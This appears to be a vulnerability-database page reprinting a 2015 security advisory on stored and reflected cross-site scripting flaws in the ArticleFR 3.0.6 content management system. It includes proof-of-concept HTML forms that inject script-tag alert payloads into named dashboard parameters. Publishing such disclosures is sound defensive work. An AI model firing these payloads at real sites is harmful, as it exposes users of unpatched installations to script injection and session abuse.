| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| Free Reprintables ArticleFR Cross-Site Scripting Vulnerability | 20 Jul 201500:00 | – | cnvd | |
| CVE-2015-5529 | 16 Jul 201515:00 | – | cve | |
| CVE-2015-5529 | 16 Jul 201515:00 | – | cvelist | |
| EUVD-2015-5484 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-5529 | 16 Jul 201515:59 | – | nvd | |
| Cross site scripting | 16 Jul 201515:59 | – | prion | |
| CVE-2015-5529 | 22 May 202500:44 | – | redhatcve |
<html><body><p>ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities
Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6
Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.
Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: nginx/1.6.2
PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php
21.06.2015
--
POST 'name' Categories Stored XSS:
----------------------------------
</p>
<form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
<input name="name" type="hidden" value='"><script>alert(1)</script>'/>
<input name="parent" type="hidden" value="0"/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="XSS #1"/>
</form>
POST 'title', 'rel' Links Stored XSS:
------------------------------------
<form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
<input name="title" type="hidden" value='"><script>alert(2)</script>'/>
<input name="url" type="hidden" value="http://www.zeroscience.mk"/>
<input name="rel" type="hidden" value='"><script>alert(3)</script>'/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="XSS #2 and #3"/>
</form>
POST 'url' Ping Server Reflected XSS:
-------------------------------------
<form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
<input name="url" type="hidden" value='http://www.zeroscience.mk"><script>alert(4)</script>'/>
<input name="submit" type="hidden" value="Add"/>
<input type="submit" value="XSS #4"/>
</form>
</body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation